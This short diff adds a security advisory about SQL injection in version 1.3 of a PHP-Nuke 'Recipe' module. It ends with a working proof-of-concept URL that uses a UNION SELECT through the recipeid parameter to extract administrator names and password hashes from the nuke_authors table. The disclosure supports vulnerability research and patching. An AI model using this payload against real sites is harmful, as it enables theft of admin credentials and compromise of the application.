+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Recipe 1.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/modules.php?name=Recipe&recipeid=-000/**/union+select+0,pwd,0,0x3a,0x3a,0,aid,aid,pwd,0,0,0,0,0x3a,0,0/**/from/**/nuke_authors/* 
\ No newline at end of file